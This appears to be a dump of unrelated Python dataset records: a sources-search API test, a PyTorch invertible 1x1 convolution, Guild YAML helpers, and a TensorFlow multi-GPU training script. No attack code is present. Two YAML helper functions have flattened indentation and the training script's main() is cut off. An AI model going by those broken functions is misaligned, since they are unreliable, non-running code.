    # Adding a 'count' key to the paginator object in the request will spare
    # the server from running query.count(). Note that the server will not
    # attempt to verify the count (since that would defeat the purpose) but
    # will simply pass it back. The server trusts that the client is passing
    # in a factual count. Here we pass in an inaccurate count for demonstration.
    json_query = json.dumps({'query': {
        'filter': ['Source', 'title', 'like', '%3%']},
        'paginator': {'page': 2, 'items_per_page': 4, 'count': 750}})
    response = self.app.request(url('sources'), method='SEARCH', body=json_query,
        headers=self.json_headers, environ=self.extra_environ_admin)
    resp = json.loads(response.body)
    # NOTE: result_set still holds the title-contains-'3' results computed
    # above; page 2 of 4 covers indices 4..7.
    assert resp['paginator']['count'] == 750
    assert len(resp['items']) == 4
    assert resp['items'][0]['id'] == result_set[4]['id']
    assert resp['items'][-1]['id'] == result_set[7]['id']
    # Test order by: order by title descending
    json_query = json.dumps({'query': {
        'filter': ['Source', 'key', 'regex', '.'],
        'order_by': ['Source', 'title', 'desc']}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin)
    resp = json.loads(response.body)
    result_set = sorted(sources, key=lambda k: k['title'], reverse=True)
    assert len(resp) == 100
    assert [s['title'] for s in result_set] == [s['title'] for s in resp]
    assert resp[-1]['title'] == None
    assert resp[0]['title'] == u'Title 90'
    assert response.content_type == 'application/json'
    # order by with missing direction defaults to 'asc'
    json_query = json.dumps({'query': {
        'filter': ['Source', 'key', 'regex', '.'],
        'order_by': ['Source', 'title']}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin)
    resp = json.loads(response.body)
    assert len(resp) == 100
    assert resp[-1]['title'] == u'Title 90'
    assert resp[0]['title'] == None
    # order by with unknown direction defaults to 'asc'
    json_query = json.dumps({'query': {
        'filter': ['Source', 'key', 'regex', '.'],
        'order_by': ['Source', 'title', 'descending']}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin)
    resp = json.loads(response.body)
    assert len(resp) == 100
    assert resp[-1]['title'] == u'Title 90'
    assert resp[0]['title'] == None
    # syntactically malformed order by
    json_query = json.dumps({'query': {
        'filter': ['Source', 'key', 'regex', '.'],
        'order_by': ['Source']}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin, status=400)
    resp = json.loads(response.body)
    assert resp['errors']['OrderByError'] == u'The provided order by expression was invalid.'
    assert response.content_type == 'application/json'
    # searches with lexically malformed order bys
    json_query = json.dumps({'query': {
        'filter': ['Source', 'key', 'regex', '.'],
        'order_by': ['Source', 'foo', 'desc']}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin, status=400)
    resp = json.loads(response.body)
    assert resp['errors']['Source.foo'] == u'Searching on Source.foo is not permitted'
    assert resp['errors']['OrderByError'] == u'The provided order by expression was invalid.'
    assert response.content_type == 'application/json'
    json_query = json.dumps({'query': {
        'filter': ['Source', 'key', 'regex', '.'],
        'order_by': ['Foo', 'id', 'desc']}})
    response = self.app.post(url('/sources/search'), json_query,
        self.json_headers, self.extra_environ_admin, status=400)
    resp = json.loads(response.body)
    assert resp['errors']['Foo'] == u'Searching the Source model by joining on the Foo model is not possible'
    assert resp['errors']['Foo.id'] == u'Searching on Foo.id is not permitted'
    assert resp['errors']['OrderByError'] == u'The provided order by expression was invalid.'
    assert response.content_type == 'application/json'
@nottest
def test_new_search(self):
    """GET /sources/new_search should return the search parameters for the sources resource."""
    builder = SQLAQueryBuilder('Source')
    search_response = self.app.get(
        url('/sources/new_search'),
        headers=self.json_headers,
        extra_environ=self.extra_environ_view)
    payload = json.loads(search_response.body)
    # The server's advertised parameters must match what a locally built
    # query builder produces.
    assert payload['search_parameters'] == h.get_search_parameters(builder)
| StarcoderdataPython |
1806971 | import numpy as np
import torch
from torch import nn as nn
from torch.nn import functional as F
from . import thops
class InvertibleConv1x1(nn.Module):
    """Invertible 1x1 convolution (Glow-style channel permutation/mixing)."""

    def __init__(self, num_channels, LU_decomposed=False):
        super().__init__()
        shape = [num_channels, num_channels]
        # Initialize with a random orthogonal matrix (Q from a QR
        # decomposition), so |det W| = 1 and the initial log-det is zero.
        init = np.linalg.qr(np.random.randn(*shape))[0].astype(np.float32)
        self.register_parameter("weight", nn.Parameter(torch.Tensor(init)))
        self.w_shape = shape
        # NOTE(review): stored but not used in this class — presumably
        # consumed by a subclass or kept for config symmetry; confirm.
        self.LU = LU_decomposed

    def get_weight(self, input, reverse):
        """Return the conv kernel (W or W^-1 as a 1x1 kernel) and d(log-det)."""
        rows, cols = self.w_shape
        pixels = thops.pixels(input)
        # log|det W| scaled by the number of spatial positions.
        dlogdet = torch.slogdet(self.weight)[1] * pixels
        if reverse:
            # Invert in double precision, then cast back, for stability.
            mat = torch.inverse(self.weight.double()).float()
        else:
            mat = self.weight
        return mat.view(rows, cols, 1, 1), dlogdet

    def forward(self, input, logdet=None, reverse=False):
        """
        log-det = log|abs(|W|)| * pixels
        """
        weight, dlogdet = self.get_weight(input, reverse)
        z = F.conv2d(input, weight)
        if logdet is not None:
            # Forward accumulates the log-det; reverse removes it.
            logdet = logdet - dlogdet if reverse else logdet + dlogdet
        return z, logdet
| StarcoderdataPython |
4970310 | # Copyright 2017-2022 TensorHub, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
import os
import re
import yaml
def encode_yaml(val, default_flow_style=False):
    """Serialize *val* as YAML, without the trailing end-of-document marker."""
    dumped = yaml.safe_dump(
        val,
        default_flow_style=default_flow_style,
        indent=2)
    return _strip_encoded_yaml(dumped)
def _strip_encoded_yaml(encoded):
stripped = encoded.strip()
if stripped.endswith("\n..."):
stripped = stripped[:-4]
return stripped
def decode_yaml(s):
    """Parse YAML string *s*, converting parse failures to ValueError.

    Returns:
        The decoded Python value.

    Raises:
        ValueError: if *s* is not valid YAML.
    """
    try:
        return yaml.safe_load(s)
    except yaml.error.YAMLError as e:
        # Catch the YAMLError base class rather than only ScannerError:
        # parser/composer errors (e.g. safe_load("{]") raises ParserError)
        # would otherwise leak PyYAML exception types to callers expecting
        # ValueError. ScannerError subclasses YAMLError, so all previously
        # handled cases are still handled.
        raise ValueError(e)
def yaml_front_matter(filename):
    """Return the parsed YAML front matter of *filename*, or {} if absent."""
    raw = _yaml_front_matter_s(filename)
    return yaml.safe_load(raw) if raw else {}
def _yaml_front_matter_s(filename):
lines = []
reading = False
with open(filename) as f:
for line in f:
trimmed = line.rstrip()
if not trimmed.lstrip():
continue
if trimmed == "---":
if reading:
return "\n".join(lines)
else:
reading = True
elif reading:
lines.append(trimmed)
else:
return None
def patch_yaml_resolver():
    """Patch yaml parsing to support Guild specific resolution rules.
    - Make '+' or '-' optional in scientific notation
    - Make use of decimal '.' optional in scientific notation
    This patch replaces the default 'tag:yaml.org,2002:float' resolver
    with an augmented set of regex patterns. Refer to
    `yaml/resolver.py` for the original patterns.

    NOTE: the resolver is registered on the Resolver class itself, so the
    change is process-wide and affects every subsequent yaml load/dump.
    """
    yaml.resolver.Resolver.add_implicit_resolver(
        u'tag:yaml.org,2002:float',
        # The patterns below are modified from the original set in two
        # ways: the first pattern makes `[-+]` optional and the second
        # pattern is a new pattern to match scientific notation that
        # does not include a decimal (e.g. `1e2`).
        # re.X (verbose) mode: whitespace/newlines in the pattern are
        # ignored, so the alternatives can be laid out one per line.
        re.compile(
            r"""^(?:[-+]?(?:[0-9][0-9_]*)\.[0-9_]*(?:[eE][-+]?[0-9]+)?
                 |[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
                 |\.[0-9_]+(?:[eE][-+][0-9]+)?
                 |[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\.[0-9_]*
                 |[-+]?\.(?:inf|Inf|INF)
                 |\.(?:nan|NaN|NAN))$""",
            re.X,
        ),
        # First characters that can start a float, used by the resolver to
        # shortlist candidate patterns.
        list(u'-+0123456789.'),
    )
# Apply the Guild-specific float resolver patch at import time unless the
# user opts out by setting NO_PATCH_YAML=1 in the environment.
if os.getenv("NO_PATCH_YAML") != "1":
    patch_yaml_resolver()
| StarcoderdataPython |
8196303 | <gh_stars>0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
from datetime import datetime
import os, pickle
import re
import time
import importlib
import sys
import numpy as np
import tensorflow as tf
import batching
import tensorflow.contrib.slim as slim
from tensorflow.python.framework import ops
from tensorflow.python.client import timeline
import util
# populate the --data_dir flag
import dataset
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('train_dir', '/tmp/imagenet_train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 10000000,
"""Number of batches to run.""")
tf.app.flags.DEFINE_string('subset', 'train',
"""Either 'train' or 'validation'.""")
# Flags governing the hardware employed for running TensorFlow.
tf.app.flags.DEFINE_integer('num_gpus', 1,
"""How many gpus to use on the system"""
"""Should be used with CUDA_VISIBLE_DEVICES""")
tf.app.flags.DEFINE_boolean('background_class', True,
"""Whether to reserve 0 as background.""")
tf.app.flags.DEFINE_boolean('log_device_placement', False,
"""Whether to log device placement.""")
tf.app.flags.DEFINE_integer('training_step_offset', 0,
"""Subtract offset from global step when calculate
learning rate.
It is useful for fine tuning a network.""")
# Yang: delete the fine tuning option here
tf.app.flags.DEFINE_string('pretrained_model_checkpoint_path', '',
"""If specified, restore this pretrained model """
"""before beginning any training.""")
# Yang: add flags to data provider and model definitions
tf.app.flags.DEFINE_string('data_provider', '',
"""The data reader class, which is located """
"""under the folder ./data_providers/ """)
tf.app.flags.DEFINE_string('model_definition', '',
"""The data reader class, located at ./models/""")
model = importlib.import_module("models.%s" % FLAGS.model_definition)
dataset_module = importlib.import_module("data_providers.%s" % FLAGS.data_provider)
tf.app.flags.DEFINE_boolean('profile', False,
"""Whether to profile using time line object.""")
tf.app.flags.DEFINE_float('clip_gradient_threshold', -1.0,
"""If the gradient is larger than this value, then clip it.
Only valid when > 0""")
tf.app.flags.DEFINE_float('initial_learning_rate', 0.1,
"""Initial learning rate.""")
tf.app.flags.DEFINE_float('num_epochs_per_decay', 30.0,
"""Epochs after which learning rate decays.""")
tf.app.flags.DEFINE_float('learning_rate_decay_factor', 0.16,
"""Learning rate decay factor.""")
# add a flag to switch optimizer
tf.app.flags.DEFINE_string('optimizer', 'sgd',
'''Select which optimizer to use. Currently'''
'''available optimizers are sgd and rmsprop''')
# Constants dictating the learning rate schedule.
RMSPROP_DECAY = 0.9 # Decay term for RMSProp.
RMSPROP_EPSILON = 1.0 # Epsilon term for RMSProp.
tf.app.flags.DEFINE_float('momentum', 0.9,
"""Momentum for SGD or RMSProp.""")
# add display interval flags
tf.app.flags.DEFINE_integer('display_loss', 10,
'''display loss info per this batch''')
tf.app.flags.DEFINE_integer('display_summary', 100,
'''display tensorboard summary per this batch''')
tf.app.flags.DEFINE_integer('checkpoint_interval', 5000,
'''checkpoint per this batch''')
tf.app.flags.DEFINE_string('EWC', 'off',
'''Elastic Weight Consolidation method status: off, stat, apply''')
def _tower_loss(inputs, outputs, num_classes, scope):
    # inputs and outputs are two lists of tensors
    """Calculate the total loss on a single tower running the CNN model.
    We perform 'batch splitting'. This means that we cut up a batch across
    multiple GPU's. For instance, if the batch size = 32 and num_gpus = 2,
    then each tower will operate on an batch of 16 images.
    Args:
      images: Images. 4D tensor of size [batch_size, FLAGS.image_size,
                                         FLAGS.image_size, 3].
      labels: Tensor of labels. Shape could be different for each task.
        Classification: 1-D integer Tensor of [batch_size].
        Detection: list of batch_size Tensors where each of them being
          a tuple of ([num_boxes, 4], [num_boxes]) denoting the box coordinates
          and the labels for each box
        Segmentation: a Tensor of [batch_size, image_sz, image_sz]
      num_classes: number of classes
      scope: unique prefix string identifying the ImageNet tower, e.g.
        'tower_0'.
    Returns:
      Tensor of shape [] containing the total loss for a batch of data
    """
    # Build inference Graph.
    logits = model.inference(inputs, num_classes, for_training=True, scope=scope)
    # Build the portion of the Graph calculating the losses. Note that we will
    # assemble the total_loss using a custom function below.
    # The per-tower batch size is taken from the static shape of the first
    # input tensor.
    split_batch_size = inputs[0].get_shape().as_list()[0]
    # model.loss registers its losses into the graph's loss collections
    # (side effect); the return value is not used here.
    model.loss(logits, outputs, batch_size=split_batch_size)
    # Assemble all of the losses for the current tower only.
    #losses = tf.get_collection(slim.losses.LOSSES_COLLECTION, scope)
    losses = slim.losses.get_losses(scope)
    # Calculate the total loss for the current tower.
    # NOTE(review): regularization losses are collected without the tower
    # scope filter — presumably weights are shared across towers; confirm.
    regularization_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
    total_loss = tf.add_n(losses + regularization_losses, name='total_loss')
    # Compute the moving average of all individual losses and the total loss.
    loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
    loss_averages_op = loss_averages.apply(losses + [total_loss])
    # Attach a scalar summmary to all individual losses and the total loss; do the
    # same for the averaged version of the losses.
    for l in losses + [total_loss]:
        # Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
        # session. This helps the clarity of presentation on TensorBoard.
        loss_name = re.sub('%s_[0-9]*/' % model.TOWER_NAME, '', l.op.name)
        # Name each loss as '(raw)' and name the moving average version of the loss
        # as the original loss name.
        # NOTE: tf.scalar_summary is the pre-1.0 TensorFlow summary API.
        tf.scalar_summary(loss_name +' (raw)', l)
        tf.scalar_summary(loss_name +' (ave)', loss_averages.average(l))
    # Make the returned total_loss depend on the moving-average update so
    # that evaluating the loss also refreshes the averages.
    with tf.control_dependencies([loss_averages_op]):
        total_loss = tf.identity(total_loss)
    return total_loss
def _average_gradients(tower_grads, include_square=False):
  """Calculate the average gradient for each shared variable across all towers.

  Note that this function provides a synchronization point across all towers.

  Args:
    tower_grads: List of lists of (gradient, variable) tuples. The outer list
      is over individual gradients. The inner list is over the gradient
      calculation for each tower.
    include_square: If True, also return per-variable averages of the
      element-wise squared gradients (used for the EWC Fisher estimate).

  Returns:
    List of (gradient, variable) pairs where the gradient has been averaged
    across all towers. If include_square is True, returns a second list of
    (squared_gradient, variable) pairs as well.

  Raises:
    ValueError: if a variable has a gradient on some towers but not on all
      of them (an inconsistent graph).
  """
  average_grads = []
  average_grads_square = []
  for grad_and_vars in zip(*tower_grads):
    # Each grad_and_vars looks like:
    #   ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
    grads = []
    none_count = 0
    for g, v in grad_and_vars:
      # BUGFIX: use identity comparison for None (`g == None` builds an
      # elementwise comparison op on some tensor types).
      if g is None:
        none_count += 1
        continue
      # Add 0 dimension to the gradients to represent the tower.
      expanded_g = tf.expand_dims(g, 0)
      # Append on a 'tower' dimension which we will average over below.
      grads.append(expanded_g)
    if none_count == 0:
      # Average over the 'tower' dimension.
      grad_cat = tf.concat(0, grads)
      grad = tf.reduce_mean(grad_cat, 0)
      # Variables are redundant because they are shared across towers, so
      # the first tower's pointer to the variable is as good as any.
      v = grad_and_vars[0][1]
      average_grads.append((grad, v))
      if include_square:
        grad2 = tf.mul(grad_cat, grad_cat, name="square_gradient")
        grad2 = tf.reduce_mean(grad2, 0)
        average_grads_square.append((grad2, v))
    elif none_count == len(grad_and_vars):
      # Missing on every tower: the variable just does not contribute to
      # the loss; skip it with a diagnostic.
      print("None gradient for %s" % (grad_and_vars[0][1].op.name))
    else:
      # Present on some towers but not others -- a real inconsistency.
      raise ValueError("None gradient error")
  if include_square:
    return average_grads, average_grads_square
  return average_grads
def _tensor_list_splits(tensor_list, nsplit):
  """Split every tensor in `tensor_list` into `nsplit` pieces along axis 0.

  Returns a list of `nsplit` lists; list i holds the i-th piece of each
  input tensor, in the original tensor order.
  """
  splits = [[] for _ in range(nsplit)]
  for t in tensor_list:
    pieces = tf.split(0, nsplit, t)
    # tf.split returns exactly nsplit pieces, so zip covers every bucket.
    for bucket, piece in zip(splits, pieces):
      bucket.append(piece)
  return splits
def train():
  # Builds the multi-GPU training graph (one tower per GPU) and runs the
  # training loop: per-tower forward/backward, tower-averaged gradients,
  # EMA of variables, periodic summaries/checkpoints. In EWC 'stat' mode it
  # instead accumulates squared gradients as a Fisher-information estimate.
  dataset = dataset_module.MyDataset(subset=FLAGS.subset)
  #assert dataset.data_files()
  """Train on dataset for a number of steps."""
  # use gpu:0 instead of cpu0, to avoid RNN GPU variable uninitialized problem
  with tf.Graph().as_default(), tf.device('/gpu:0'):
    # Create a variable to count the number of train() calls. This equals the
    # number of batches processed * FLAGS.num_gpus.
    global_step = tf.get_variable(
        'global_step', [],
        initializer=tf.constant_initializer(0), trainable=False)
    # Calculate the learning rate schedule.
    num_batches_per_epoch = (dataset.num_examples_per_epoch() /
                             FLAGS.batch_size)
    decay_steps = int(num_batches_per_epoch * FLAGS.num_epochs_per_decay)
    # Decay is offset by training_step_offset so resumed runs can restart
    # the schedule from a chosen step.
    lr = tf.train.exponential_decay(FLAGS.initial_learning_rate,
                                    global_step-FLAGS.training_step_offset,
                                    decay_steps,
                                    FLAGS.learning_rate_decay_factor,
                                    staircase=True)
    # Create an optimizer that performs gradient descent.
    if FLAGS.optimizer == "rmsprop":
      opt = tf.train.RMSPropOptimizer(lr, decay=RMSPROP_DECAY,
                                      momentum=FLAGS.momentum,
                                      epsilon=RMSPROP_EPSILON)
    elif FLAGS.optimizer == "sgd":
      opt = tf.train.MomentumOptimizer(lr, FLAGS.momentum,
                                       use_nesterov=False)
    elif FLAGS.optimizer == "adadelta":
      opt = tf.train.AdadeltaOptimizer()
    elif FLAGS.optimizer == "adam":
      opt = tf.train.AdamOptimizer()
    else:
      print("optimizer invalid: %s" % FLAGS.optimizer)
      return
    # Get images and labels for ImageNet and split the batch across GPUs.
    assert FLAGS.batch_size % FLAGS.num_gpus == 0, (
        'Batch size must be divisible by number of GPUs')
    split_batch_size = int(FLAGS.batch_size / FLAGS.num_gpus)
    # Override the number of preprocessing threads to account for the increased
    # number of GPU towers.
    #num_preprocess_threads = FLAGS.num_preprocess_threads * FLAGS.num_gpus
    # choose not to overide, to have a finer control of how many threads to use
    num_preprocess_threads = FLAGS.num_preprocess_threads
    net_inputs, net_outputs = batching.distorted_inputs(
        dataset,
        num_preprocess_threads=num_preprocess_threads)
    input_summaries = copy.copy(tf.get_collection(tf.GraphKeys.SUMMARIES))
    init_op = tf.initialize_all_variables()
    # Number of classes in the Dataset label set plus 1.
    # Label 0 is reserved for an (unused) background class.
    if FLAGS.background_class:
      num_classes = dataset.num_classes() + 1
    else:
      num_classes = dataset.num_classes()
    # Split the batch of images and labels for towers.
    # TODO: this might become invalid if we are doing detection
    input_splits = _tensor_list_splits(net_inputs, FLAGS.num_gpus)
    output_splits = _tensor_list_splits(net_outputs, FLAGS.num_gpus)
    # Calculate the gradients for each model tower.
    tower_grads = []
    for i in xrange(FLAGS.num_gpus):
      with tf.device('/gpu:%s' % i):
        with tf.name_scope('%s_%d' % (model.TOWER_NAME, i)) as scope:
          if True:
            # I don't see any improvements by pinning all variables on CPU, so I disabled this
            # Force all Variables to reside on the CPU.
            #with slim.arg_scope([slim.variable], device='/cpu:0'):
            # do not use this line, as it will assign all operations to cpu
            #with tf.device('/cpu:0'):
            # Calculate the loss for one tower of the CNN model. This
            # function constructs the entire CNN model but shares the
            # variables across all towers.
            loss = _tower_loss(input_splits[i], output_splits[i], num_classes,
                               scope)
          if i==0:
            # set different learning rates for different variables
            if hasattr(model, 'learning_rate_multipliers'):
              # this function returns a dictionary of [varname]=multiplier
              # learning rate multiplier that equals to one is set by default
              multiplier = model.learning_rate_multipliers()
              # computing the vars that needs gradient
              # (variables with a ~zero multiplier are frozen entirely)
              grad_var_list = []
              for t in tf.trainable_variables():
                v = t.op.name
                if (v in multiplier) and (abs(multiplier[v]) < 1e-6):
                  pass
                else:
                  grad_var_list.append(t)
              print("-"*40 + "\n gradient will be computed for vars:")
              for x in grad_var_list:
                print(x.op.name)
            else:
              multiplier = None
              grad_var_list = None
          # Reuse variables for the next tower.
          tf.get_variable_scope().reuse_variables()
          # Retain the summaries from the final tower.
          summaries = tf.get_collection(tf.GraphKeys.SUMMARIES, scope)
          # Retain the Batch Normalization updates operations only from the
          # final tower. Ideally, we should grab the updates from all towers
          # but these stats accumulate extremely fast so we can ignore the
          # other stats from the other towers without significant detriment.
          batchnorm_updates = tf.get_collection(ops.GraphKeys.UPDATE_OPS, scope)
          #batchnorm_updates = tf.get_collection(slim.ops.UPDATE_OPS_COLLECTION,
          #                                      scope)
          # Calculate the gradients for the batch of data on this CNN
          # tower.
          grads = opt.compute_gradients(loss, var_list=grad_var_list)
          # Keep track of the gradients across all towers.
          tower_grads.append(grads)
    # We must calculate the mean of each gradient. Note that this is the
    # synchronization point across all towers.
    if FLAGS.EWC == "stat":
      grads, grads2 = _average_gradients(tower_grads, True)
      # merge grads2 into a dict of variable
      out = {}
      vard = {}
      for g2, v in grads2:
        out[v.op.name] = g2
        vard[v.op.name] = v
      grads2 = out
    else:
      grads = _average_gradients(tower_grads)
    # Add a summaries for the input processing and global_step.
    summaries.extend(input_summaries)
    # Add a summary to track the learning rate.
    summaries.append(tf.scalar_summary('learning_rate', lr))
    # Add histograms for gradients.
    for grad, var in grads:
      if grad is not None:
        summaries.append(
            tf.histogram_summary(var.op.name + '/gradients', grad))
    if multiplier:
      print("-" * 40 + "\nusing learning rate multipliers")
      # Scale each variable's gradient by its configured multiplier.
      grads_out=[]
      for g, v in grads:
        v_name = v.op.name
        if v_name in multiplier:
          g_out=tf.mul(multiplier[v_name], g)
          print(v_name, " * ", multiplier[v_name])
        else:
          g_out=g
          print(v_name, " * 1.00")
        grads_out.append((g_out, v))
      grads = grads_out
    # gradient clipping
    if FLAGS.clip_gradient_threshold > 0:
      print("-"*40 + "\n Gradient Clipping On")
      t_list = [x[0] for x in grads]
      t_list, gnorm = tf.clip_by_global_norm(
          t_list,
          FLAGS.clip_gradient_threshold,
          name='gradient_clipping')
      grads = [(t_list[i], grads[i][1]) for i in range(len(t_list))]
    # Apply the gradients to adjust the shared variables.
    apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
    # Add histograms for trainable variables.
    for var in tf.trainable_variables():
      summaries.append(tf.histogram_summary(var.op.name, var))
    # Track the moving averages of all trainable variables.
    # Note that we maintain a "double-average" of the BatchNormalization
    # global statistics. This is more complicated then need be but we employ
    # this for backward-compatibility with our previous models.
    variable_averages = tf.train.ExponentialMovingAverage(
        model.MOVING_AVERAGE_DECAY, global_step)
    # Another possiblility is to use tf.slim.get_variables().
    variables_to_average = (tf.trainable_variables() +
                            tf.moving_average_variables())
    variables_averages_op = variable_averages.apply(variables_to_average)
    # Group all updates to into a single train op.
    batchnorm_updates_op = tf.group(*batchnorm_updates)
    train_op = tf.group(apply_gradient_op, variables_averages_op,
                        batchnorm_updates_op)
    # Create a saver.
    saver = tf.train.Saver(tf.all_variables())
    # Build the summary operation from the last tower summaries.
    summary_op = tf.merge_summary(summaries)
    # some variables allocated for the accumulators
    # (EWC 'stat' mode: one non-trainable accumulator per variable, summed
    # every step and normalized by the step count at the end)
    if FLAGS.EWC == "stat":
      grads2_accu = {}
      accu_ops = {}
      with tf.device('/gpu:0'):
        for key in grads2.keys():
          shape = [x.value for x in grads2[key].get_shape()]
          grads2_accu[key] = tf.Variable(initial_value=np.zeros(shape, dtype=np.float32),
                                         trainable=False,
                                         name=key+"_accumulator")
          accu_ops[key] = tf.assign_add(grads2_accu[key], grads2[key], name=key+"_assign_add")
    # Build an initialization operation to run below.
    init = tf.initialize_all_variables()
    # Start running operations on the Graph. allow_soft_placement must be set to
    # True to build towers on GPU, as some of the ops do not have GPU
    # implementations.
    config = tf.ConfigProto(
        allow_soft_placement=True,
        log_device_placement=FLAGS.log_device_placement,
        intra_op_parallelism_threads=1)
    config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)
    sess.run(init)
    # TODO: not supported to load from different number of towers now
    if FLAGS.pretrained_model_checkpoint_path:
      assert tf.gfile.Exists(FLAGS.pretrained_model_checkpoint_path)
      #variables_to_restore = tf.get_collection(slim.variables.VARIABLES_TO_RESTORE)
      variables_to_restore = slim.get_variables_to_restore()
      # only restore those that are in the checkpoint
      existing_vars = util.tensors_in_checkpoint_file(FLAGS.pretrained_model_checkpoint_path)
      restore_new = []
      ignore_vars = []
      for x in variables_to_restore:
        if x.op.name in existing_vars:
          restore_new.append(x)
        else:
          ignore_vars.append(x.op.name)
      if len(ignore_vars)>0:
        print("-"*40+"\nWarning: Some variables does not exists in the checkpoint, ignore them: ")
        for x in ignore_vars:
          print(x)
      variables_to_restore = restore_new
      restorer = tf.train.Saver(variables_to_restore)
      restorer.restore(sess, FLAGS.pretrained_model_checkpoint_path)
      print('%s: Pre-trained model restored from %s' %
            (datetime.now(), FLAGS.pretrained_model_checkpoint_path))
    # Start the queue runners.
    tf.train.start_queue_runners(sess=sess)
    summary_writer = tf.train.SummaryWriter(
        FLAGS.train_dir,
        graph_def=sess.graph.as_graph_def(add_shapes=True))
    start_time = time.time()
    duration_compute=0
    grads2_count = 0
    # Resume the loop from the persisted global_step value.
    step_start = int(sess.run(global_step))
    try:
      for step in xrange(step_start, FLAGS.max_steps):
        # call a function in the model definition to do some extra work
        if hasattr(model, 'update_each_step'):
          model.update_each_step(sess, step)
        if FLAGS.EWC == "stat":
          # EWC statistics mode: no train_op is run; only accumulate
          # squared gradients, then dump them on the final step.
          grads2_accu_op = grads2_accu
          if step == (FLAGS.max_steps - 1):
            sessout = sess.run([grads2_accu_op, accu_ops])
            grads2_accu=sessout[0]
          else:
            if FLAGS.profile:
              run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
              run_metadata = tf.RunMetadata()
              sess.run(accu_ops, options=run_options, run_metadata=run_metadata)
              tl = timeline.Timeline(run_metadata.step_stats)
              ctf = tl.generate_chrome_trace_format()
              with open(os.path.join(FLAGS.train_dir, 'timeline.json'), 'w') as f:
                f.write(ctf)
              print("generated a time line profile for one session")
            else:
              sess.run(accu_ops)
          grads2_count += 1
          if step == (FLAGS.max_steps - 1):
            # save the fisher infomation matirx
            for key in grads2_accu.keys():
              grads2_accu[key] /= grads2_count
            fname = os.path.join(FLAGS.train_dir, "EWC_stat.pkl")
            pickle.dump(grads2_accu, open(fname, "wb"))
            # save the MAP file
            vard_v = sess.run(vard)
            fname = os.path.join(FLAGS.train_dir, "EWC_map.pkl")
            pickle.dump(vard_v, open(fname, "wb"))
          if (step + 1) % FLAGS.display_loss == 0:
            print ("processed ", step-step_start, " examples")
          continue
        has_run_meta = False
        if FLAGS.profile:
          run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
          run_metadata = tf.RunMetadata()
          start_time_compute = time.time()
          _, loss_value = sess.run([train_op, loss], options=run_options, run_metadata=run_metadata)
          duration_compute = duration_compute + time.time() - start_time_compute
          # Create the Timeline object, and write it to a json
          tl = timeline.Timeline(run_metadata.step_stats)
          ctf = tl.generate_chrome_trace_format()
          with open(os.path.join(FLAGS.train_dir, 'timeline.json'), 'w') as f:
            f.write(ctf)
          print("generated a time line profile for one session")
        else:
          start_time_compute = time.time()
          if (step + 1) % (FLAGS.display_summary * 10) == 0:
            has_run_meta = True
            # profile in a longer interval
            run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
            run_metadata = tf.RunMetadata()
            _, loss_value, summary_str = \
                sess.run([train_op, loss, summary_op],
                         options=run_options,
                         run_metadata=run_metadata)
            summary_writer.add_run_metadata(run_metadata, 'step%d' % step)
            summary_writer.add_summary(summary_str, step)
            print('Adding run metadata for', step)
            # Create the Timeline object, and write it to a json
            tl = timeline.Timeline(run_metadata.step_stats)
            ctf = tl.generate_chrome_trace_format()
            with open(os.path.join(FLAGS.train_dir, 'timeline.json'), 'w') as f:
              f.write(ctf)
            print("generated a time line profile for one session")
          else:
            _, loss_value = sess.run([train_op, loss])
          duration_compute = duration_compute + time.time() - start_time_compute
        assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
        if (step+1) % FLAGS.display_loss == 0:
          duration = (time.time() - start_time) / FLAGS.display_loss
          duration_compute = duration_compute / FLAGS.display_loss
          examples_per_sec = FLAGS.batch_size / float(duration)
          format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
                        'sec/batch; compute %.1f examples/sec)')
          print(format_str % (datetime.now(), step, loss_value,
                              examples_per_sec, duration,
                              FLAGS.batch_size/duration_compute))
          duration_compute=0
          start_time = time.time()
        if (step+1) % FLAGS.display_summary == 0 and not has_run_meta:
          summary_str = sess.run(summary_op)
          summary_writer.add_summary(summary_str, step)
        # Save the model checkpoint periodically.
        if step % FLAGS.checkpoint_interval == 0 or (step + 1) == FLAGS.max_steps:
          checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
          saver.save(sess, checkpoint_path, global_step=global_step)
    except KeyboardInterrupt:
      # Ctrl-C: persist the current weights before exiting.
      print("Control C pressed. Saving model before exit. ")
      checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
      saver.save(sess, checkpoint_path, global_step=global_step)
      sys.exit()
def main(_):
  """Entry point: resolve which checkpoint (if any) to resume from, then train.

  If no pretrained checkpoint is given explicitly, scans FLAGS.train_dir for
  the newest 'model.ckpt-<step>' file and resumes from it; otherwise creates
  a fresh train_dir.
  """
  print(tf)
  # fix the profile lib not found issue
  if "LD_LIBRARY_PATH" not in os.environ:
    os.environ["LD_LIBRARY_PATH"] = ""
